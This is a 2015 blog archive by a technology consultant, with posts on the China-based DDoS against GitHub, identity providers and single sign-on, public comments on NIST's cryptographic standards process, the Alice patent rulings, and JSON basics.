Archive for March, 2015

The recent Github attack

2015/03/31

Last Thursday (3/26/2014) a DDoS attack on the code sharing site github.org began, targeting github code pages for greatfire.org, a non-profit that mirrors the web content of sites censored by China, and cn-nytimes.com, a mirror of the Chinese version of the Times, also censored by China. Connections to github.org are via https and are encrypted. Thus “code” posted can be any content, and China’s Great Firewall, can’t filter it when an ordinary citizen retrieves it. China tried to block all of github.org in 2013, but its software technology sector objected to the point that the block was removed.

It appears that there were a number of DDoS attack vectors and techniques, but the one that interested me the most, described in detail by insight-labs, was to hijack the Chinese browser Baidu’s user tracking javascript code (similar to Google Analytics code) and to insert a loop that opened https://github.org/greatfire/ and https://github.org/cn-nytimes/ every two seconds. Thus everyone in China that uses this popular browser became an attack site against github! Since China controls its inner network and the Internet border, it was more or less trivial to insert this MITM (or as netresec.com calls it, a “man on the side”) attack. Apparently only a small fraction of Baidu retrieved pages get injected with this attack; most pages are retrieved normally. Thus Baidu users rarely notice a glitch.

The bottom line is that China’s Great Firewall has been converted from a censorship tool to an attack tool. The folks at Baidu claim to know nothing about this, and frankly, I’m hard pressed to figure out what they could have done to their browser to prevent this hijack. Could our NSA hijack Microsoft’s Internet Explorer in this way?

Identity Providers (IdPs) and Identity Management

2015/03/25

The identity management problem is complex and getting more and more complex as the Internet evolves. Within a corporation there are multiple users that have multiple roles. Any given user needs to access several public, multi-tenant resources on the Internet, e.g. public clouds, public backup systems, public SaaS applications, and other services. A user most likely has multiple devices from which such access is needed from multiple locations around the world. In addition each individual user may have several security contexts from which authentication is needed; for example, the user’s company, personal use, charitable organization, little league sports team, etc. As we’ve discussed before, a username and password for each combination of device, context, resource is a totally unmanageable situation from many perspectives. Throw in privacy concerns and bad actors who steal and misuse identities, the computing industry has a serious identity problem.

Inside a federation of multiple Service Providers, multiple corporations of users, multiple types of name directories, and multiple Identity Providers, what makes for a good Identity Provider? More generally, in the context of the federation, what makes for a good Identity Management System?

At the highest level, users want unfettered (and secure) access to lots of Service Providers (SPs). When you see a commercial IdP advertised, usually the first marketing statement is the number of “applications” it supports, and of course, there are a few big ones like Saleforce.com, Office 365, and Google Apps that are essential. It is not unusual for an IdP to advertise “thousands” of applications. Some applications want strong authentication, some use only certain protocols or data formats, etc. A user’s corporation may insist on the integration of a particular name service, e.g. Active Directory, LDAP, RADIUS, Tivoli Directory, etc. The IdP is in the middle and must support at least those combinations that the customer needs.

Thus, at the next level, the key things one wants an Identity Provider to do are also listed in the marketing material for various IdPs:

  1. Authenticate a user in multiple ways, e.g. extra security questions, hardware frobs, difficult passwords, email, SMS, Telephony, X.509, PIN, Common Access Card (CAC), government Personal Identity Verification (PIV) card, smart card, bio-metric readers, Yubikey, LastPass, KeePass (open-source), etc.
  2. Pass this authentication around (“credential mapping”) the federation without having the user re-authenticate unless additional authentication is needed (as opposed to re-authentication); support OpenID Connect, SAML 2.0, WS-Trust Security Token Service (STS), and others
  3. Allow service providers to require different levels of authentication based on risk or on the importance of the service: user IP address, IP reputation, group membership, geo location and geo-velocity. Support black and white lists to override risk algorithms
  4. Support multiple user devices, incl. Mobile
  5. Multiple application types (SaaS, Web, Internal, Mobile, …)
  6. Support various name services: AD, LDAP, JDBC, ODBC, Sun One, Novell eDirectory, Tivoli Directory, JBoss Web services, RADIUS, etc.
  7. Support Single Sign On (SSO) via SAML 2.0, OpenID Connect, Kerberos Key Distribution Center (KDC), …
  8. Security auditing, XDAS
  9. Identify anomalous user activity
  10. Participate in the enterprise disaster recovery with high redundancy

Some final thoughts about security: Many users, myself included, have been skeptical about the security of an Internet-wide Single Sign On facility. Such a service would be a juicy target for nefarious hackers. Passing around tokens on semi-secure channels appears to invite “pass the hash” and “man in the middle” exploits. The more functionality that an IdP product has, the more opportunity for bugs that open security holes. The more personal identifying information that a product holds, no matter how encrypted, the more inviting a target the IdP becomes. In addition, users should worry about who owns the encryption keys and how they are managed. Some vendors are obtaining security certifications such as SSAE 16, SOC 2 or ISO/IEC 27001. A vendor that gets such a certification is not only thinking about security, it is doing something about it.

My next IAM post is on SAML.  It is here.

Comments on NIST Interagency Report 7977, Draft 2

2015/03/24

To: crypto-review@nist.gov

Cc: crypto@nist.gov

Re: NIST Interagency Report NISTIR 7977 “NIST Cryptographic Standards and Guidelines Development Process” January 2015 Draft.

Date: March 24, 2015

The January 2015 Draft is a big improvement. In addition, the Summary of Public Comments on NISTIR 7977 (Feb 2014 (First) Draft) was quite helpful to compare how the current draft addresses comments on the first draft. The authors of both new documents are to be commended for their work.

General review comments:

A. Review comments on the first draft of NISTIR 7977 reflect a distrust of the NSA, and by extension of NIST processes. Suppose China sends NIST an email that says, “Hey, we’ve been studying elliptic curve E over field Z/p with base point Q. It has some neat properties, and China recommends that NIST adopt E for its elliptic curve encryption.” Should NIST consider China’s suggestion? A good test of the processes in NISTIR 7977, would be to answer “yes”, even though we suspect that China knows a backdoor to encryption that uses E. Now, receiving such a suggestion from the NSA should be little different. Even though NIST is required to consult with the NSA, most independent security consultants, post-Snowden, would not trust a curve suggested by the NSA any more than one suggested by China. I certainly would not. Therefore we look for processes in NISTIR 7977 that politely look with great suspicion on suggestions for tools and algorithms from the NSA. NIST should get expertise and knowledge from the NSA, but should not blindly accept its tools and algorithms. NIST processes for analysis and acceptance of any suggestion, be it from the NSA, from China, or from any other source should be equally stringent. In particular, cryptographic technology should not be standardized without significant consensus from a wide swath of independent cryptographers. The current draft of NISTIR 7977 does not have an emphasis on public analysis and consensus for acceptance.

B. Of course, NIST could standardize, say an encryption method, even from a private and independent source, and the NSA, China’s PLA Unit 1398, the UK’s GCHQ, or other nation-state cryptography group could know how to crack this encryption method, remaining silent during and after the standardization process. One would hope that NIST, through its own efforts and its financial support of academic and other cryptography research would facilitate the discovery of the weakness and would quickly retire the standard. Such post-standardization life cycle efforts by NIST also need to be part of NISTIR 7977 [line 727].

C. Now if NIST were to publish a proof that a tool or algorithm received from China, the NSA, or another source in fact had no back doors and was totally secure then a consensus on standardization might well be easily achieved. After believing such a proof, I might recommend the proven technology to my clients, but I probably would wait until a huge number of non-government cryptographers also believed the proof and also were recommending this technology. NISTIR 7977 says roughly that NIST will “pursue” to find and use proofs [line 55]. I’d be happy if NIST worked with the NSA and other agencies on such proofs and would recommend such efforts be part of NISTIR 7977.

D. NIST publishes security papers at a prodigious rate. So fast that reviews are deemed inadequate. In light of post-Snowden caution around NIST processes, people naturally ask if these poorly reviewed papers can be trusted. It isn’t going to help if NIST says, “It’s ok, the NSA has reviewed it…” Look, not only does the current draft of NISTIR 7977 fail to convince that future NIST papers will receive good independent reviews, there was no indication that past NIST papers will retroactively receive good reviews. This is a very sad state of affairs, but it is fixable.

Some more specific review comments:

  1. Clarity of the NIST Mission: To develop strong cryptographic standards and guidelines for meeting U.S. federal agency non-national security and commerce needs. This mission should be parsed: To develop strong cryptographic standards and guidelines for meeting 1. U.S. federal agency non-national security needs and 2. commerce needs. My point is that the needs of commerce should treated by NIST as equal to the needs of any federal agency. [line 202 Balance]. For example, federal agencies may well be happy with NSA algorithms, but general commerce may not be.
  2. I do not agree with the NIST Response (page 7 of Summary) to Technical Merit comments that NIST should give priority to non-national security federal information systems. NIST should always make commerce needs equally important. Such a priority statement doesn’t seem to be in NISTIR 7977 explicitly, but there are several statements about NIST being legally required to give such a preference when so ordered by a government entity.
  3. NIST’s statement that it will “never knowingly misrepresent or conceal security properties” [Summary page 3; line 215 Integrity] reminds me of Barry Bond’s statement that he “never knowingly took growth steroids” when his hat/head size at the end of his career was three sizes larger than when he was a rookie. I would prefer a more proactive statement such as “NIST will make every reasonable effort to ensure that military, intelligence and law enforcement agencies by their suggestions, review comments, or contributions do not compromise any security tool or algorithm recommended by NIST.” For NIST standards to regain the confidence of the security and general commerce communities, NIST processes should convincingly ensure by NIST public actions that its tools and algorithms do not compromise the privacy or the integrity of any commercial or private message being protected by NIST standards.
  4. The FISMA requirement that NIST consult with certain federal agencies including the NSA to avoid duplication of effort and to maintain synergy of federal information protection efforts, but NIST can never in the future blindly accept a recommendation from any public or private agency. What is important is that NIST actively regain and maintain its process integrity via the new NISTIR 7977. The current draft falls short.
  5. NIST should consider resolving the conundrum of needing NIST output frequently and needing adequate public reviews of such output by the creation of additional outside paid review boards and conformance testing bodies. Such a review board should be established to review annually the entire Cryptographic Technology Group. [lines 316 and 326]
  6. Minutes of the monthly NIST/NSA meetings should be published. [line 377]
  7. Independent review boards should have the power to reject a proposed standard, say if NIST could not convince the board that the NSA or another agency has not compromised the standard. [page 4; lines 47, 403, and 464]
  8. The NISTIR 7977 Development Process itself should undergo regular review and updates at, say, an annual frequency.

Requested Comments [line 125]:

NIST Question Comment

Do the expanded and revised principles state appropriate drivers and conditions for NIST’s efforts related to cryptographic standards and guidelines?

Yes, but if the word “appropriate” were replaced by “adequate” then No. Neither the integrity of NIST processes in face of NSA influence, nor the issue of adequate review are satisfactorily answered. [A, C, D]

Do the revised processes for engaging the cryptographic community provide the necessary inclusivity, transparency and balance to develop strong, trustworthy standards? Are they worded clearly and appropriately? Are there other processes that NIST should consider?

No. “Trustworthy” standards need public confidence that the NSA or another agency have not added or know of backdoors or other weaknesses to their contributions. Wording isn’t an issue. Different new processes are necessary to separate NIST from NSA and other related agency influence. After-standardization research efforts should be funded as part of all life cycles [B].

Do these processes include appropriate mechanisms to ensure that proposed standards and guidelines are reviewed thoroughly and that the views of interested parties are provided to and considered by NIST? Are there other mechanisms NIST should consider?

No. Cf. A, C, 2, 3, 4, and 7 above. Regarding 7, if NIST won’t vest veto power to independent reviewers, such experts will tend to not participate. Lack of review resources also seems to be a problem. Cf. 5 above.

Are there other channels or mechanisms that NIST should consider in order to communicate most effectively with its stakeholders?

Yes. More paid outside reviewers including an annual review of the Cryptographic Technology Group. Cf. D and 5 above.

Respectfully submitted,

Gayn B. Winters, Ph.D.

Technology Consultant

SSO – Single Sign On

2015/03/14

Early time-sharing systems provided a security model for the underlying file system that provided many services with a single log-in. Access to any branch of the file system was determined by its “ownership” via the familiar Read, Write, Execute flags for Owner, Group, World.

It wasn’t too long before Owner, Group, World was too restrictive and Roles/Groups were introduced where any user could belong to multiple Roles/Groups and access was determined by the least restrictive flag for the Groups to which that user belonged.

Clusters of very similar machine types and operating systems, often with a high speed interconnect between the machines and their devices permitted single sign-on to the systems in the cluster. Several system vendors provided proprietary clusters.

Microsoft Windows Domains pushed the cluster idea out to the LAN, where multiple LAN vendors had already pioneered single log on to the LAN. Microsoft Windows Primary and secondary Domain Controllers on the LAN synchronized user identity data to provide single log on to the domain for every user. We used Domains in our office when we still had a modem connection to the Internet. With time, however, the Internet eventually providing reasonable speed access to application/service servers around the world, such applications proliferated. There seems to be no end to the creativity of application developers on the web. But now users were having to provide separate log on authentication data for each application or service. In the small this was manageable, however it wasn’t too long before what NIST has called “password fatigue” set in. Internet users, wanting to access multiple services, started to

  • write down their (service or web site) usernames and passwords in documents, spreadsheets, and even on yellow Post-its stuck to their monitor.
  • re-use usernames and passwords
  • use overly simple passwords
  • cheat with the same username (often an email address) and simple passwords both of which are used across multiple applications and services
  • let their applications remember usernames and passwords, often in world readable cookies on the workstation.
  • Lose their usernames and password and ask system administrators (or special privileged software) to re-issue them for the user with imperfect memory.

Aside from being an expensive administrative mess, using multiple usernames and passwords was and still is decidedly insecure. Wouldn’t it be better if a user could sign on to a single service, which in turn could provide automated sign on to application/service servers? Well, yes and no. If such an “identity server” were compromised, then all of its user clients could be totally compromised. On the other hand, great care would probably be given to the construction of such a server, to the secure use of connections to it (e.g. via the latest SSL/TLS), and to the encryption of identity data held within it. With some care, this “IDaaS” could also support mobile devices, business partners (e.g. those in a supply chain), and even the Internet of Things.

The above diagram shows an Identity Provider, IdP, which services multiple application service providers, and multiple clients. This diagram implies that the multiple users belong to the same enterprise with a common Name Server and a common IdP. While it would make for a messier diagram, users from multiple enterprises that need to share applications could also be supported.

Provisioning. The users request application provisioning, either as an initial sign-up or as the first time the application is used. The IdP not only provisions the user, but also learns the protocols by which the user (and IdP) can communicate with the application. This includes learning the type of tokens the application will accept for authentication.

Such complexity tends to bloat IdP implementations, and different schemes for lightweight (or “lighter weight”) identity servers have been proposed that take advantage of existing name servers, identity managers, etc. Some vendors split up their implementation into multiple products. For example, some vendors define bridge products that translate one protocol or token format to a different one. History shows that this complexity will pass as standards converge and server speeds increase making full functionality in a single IdP product fast and scalable. Such optimism aside, there are at least a dozen vendors of Single Sign On identity providers today that address this complexity to varying degrees. Each product comes with its own system integration problems that an enterprise must weigh as it selects a Single Sign On vendor.

When a vendor collapses the IdP and the Name Server into a single product, the result can be interesting. When this product is placed in the cloud, it can be even more interesting. Some security companies have such a product, as does Microsoft with its Azure Active Directory.

I see a lot of “sign on with SocialSite” buttons on various vendor sites. The superficial idea is to allow your SocialSite to be an IdP for you. Pick your favorite half dozen social sites, and one is probably listed. There is a privacy issue here: Signing on with SocialSite gives the vendor access to all the information on your social site. This may be ok, but then again, you may not want that vendor or its customers to be grabbing information off your site or worse, posting information to your site. For me at least, I never log in using a social site.

My next IAM post is here.

Alice

2015/03/02

A friend of mine, The Patent King, pointed out to me that the recent court decisions on patents are going to change what software can be patented. This is both a forward and a backward statement. In fact, all of the court cases are backward looking cases, and the Patent Office in its consideration of future patents will be forward looking. These new considerations are collectively called “Alice” primarily after:

  • Alice: Alice Corp. Pty. Ltd. v. CLS Bank Int’l (2014)

but quite a few other court cases come into play. The references below, all of which I found enlightening, cite such cases.

The technology issue is: What software is patentable? The two-step answer starts simply enough. Step 1: The claim must be directed to a process, machine, manufacture, or composition of matter. This is not new. Typically software patents are directed to processes or to machines, and this post will focus on these.

New is Step 2: You are almost out of luck if your claim is directed to a law of nature, a natural phenomenon, or an abstract idea; however, Alice provides some wiggle room for dealing with these “judicial exceptions.” Your claim must identify the exception and must state explicitly how your invention, as a whole, amounts to significantly more than the exception.

Of course the trick is to satisfy “significantly more”. This is similar to the Potter Stewart test for hard core pornography, “I know it when I see it.” As technologists interested in an issued or a future patent, we must work with our patent attorneys to review as many similar cases as we can and make our arguments accordingly.

The rest of this post considers some interesting exceptions mostly of type “abstract ideas”. These include mathematical formulas, mitigating risk (hedging), using advertising as currency, processing information through a clearing house, authentication, organizing information, formulas for updating alarm limits, comparing new and stored information to identify options for action, etc. The “et cetera” means there is no end to the types of abstract ideas.

Returning to the Alice case itself, the patent was about a computer system that acted as an intermediary to maintain and adjust account balances to satisfy business obligations and settlement risk. Since this is a long standing commercial practice, and the patent cites this abstract idea, it is a judicial exception. However, viewing the claim as a whole, it failed to add significantly to the abstract idea. In other words, just crunching the numbers on a computer system is not patentable.

The Ultramercial patent 7,346,545 (the “545 patent”) provided an interesting case. The patent concerned an eleven step process whereby a consumer receives copyrighted material in exchange for viewing an advertisement. Ultramercial sued Hulu, YouTube, and WildTangent for patent infringement. This case bounced around the courts, but after Alice, it was determined that each of the eleven steps as a whole merely implemented the abstract idea of using ads for currency and did not add significantly more to this abstract concept. The 545 patent was ultimately declared invalid.

The case Bilski v. Kappos (2010) concerned Bilski’s patent on hedging to mitigate settlement risk. This patent was deemed too broad and covered well-known practices in a comprehensive way. Fundamentally, one cannot patent an invention that covers an entire abstract and well-known idea.

Mayo Collaborative services v. Prometheus Labs. Inc. (2012) provides an example where an action (raising or lowering the amount of a drug administered) was taken based on a blood test (for metabolites). The action would be normal for any well informed doctor. This case actually falls under the law of nature exception, but the principle applies elsewhere. If all your software does is automate what a trained practitioner does normally, then it is not patentable.

Ancora Technologies, Inc. v. Apple, Inc. is interesting and is not yet resolved by the Supreme Court. Ancora’s invention was to put authentication software in the flash reserved for the BIOS. This would make it more difficult for a hacker to get around the authentication check. Ancora sued Apple for infringement of their patent 6,411,941 (the “941 patent”). If it is accepted that authentication checks are abstract ideas, then is putting such a check in the BIOS flash significantly more than other implementations of this abstract idea? If putting such a check on a hard disk is not patentable, then why should putting such a check in the BIOS flash be patentable? Is the method of putting the check in the BIOS flash and not screwing up the BIOS a patentable significant extension of the abstract idea? Apple has appealed to the Supreme Court.

There are some interesting ramifications of Alice to the cloud, data analytics, and cyber-security worlds. Look for future posts on these topics.

Recommended Reading:

Go Ask Alice – Delightful paper by Berkeley law professor Joe Merges

Patent Eligibility in the Wake of Alice – Nice analysis by Berkowitz and Schaffner

Summary of Ancora v. Apple – by IP firm Sughru Mion

Apple appeals Ancora Ruling – News flash from Law360

USPTO 2014 Interim Alice Training – Very good slide-set tutorial

JSON – JavaScript Object Notation

2015/03/01

For reasons that are inexplicable to me, JSON is not a subset of JavaScript. The reason is a few weird non-escaped characters. Cf. RFC 7159. JSON is a language independent data format. A formal definition and parsing libraries for various programming languages can be found on JSON.org. Briefly JSON’s data types are:

  • Number – a signed decimal number with optional fractional part and optional exponent E part. JSON numbers are typically implemented as double precision floating point numbers.
  • String – zero or more Unicode characters bracketed by double quotes. A backslash is the escape character.
  • Boolean – true or false
  • Array – ordered list of zero or more values of any JSON type, delimited by square brackets, and separated by commas.
  • Null – an empty value null.
  • Object – an unordered set of comma separated name:value pairs delimited by braces. It is recommended that the names be unique Strings in order to implement associative arrays.

JSON values are: number, string, array, object, true, false, and null. Whitespace characters are: space, tab, line feed and carriage return. Whitespace can be used around and between values and punctuation.

Recent identity management standards (but not SAML) use JSON to encode

  • JWT tokens
  • JWK keys
  • JWE encryption
  • JWA algorithms
  • JWS signatures

Subtle points: JSON doesn’t distinguish various implementations of Number, e.g. support for signed zeros, under and over-flows, integers, etc. There is no support for JavaScript data types of Date, Error, Regular Expression, Function, and undefined (other than null.) Even being careful with escapes, so that even though properly escaped JSON values are JavaScript values, the use of eval() is not recommended. Use JSON.parse() instead of eval().

The next IAM post is Single Sign On (SSO) here.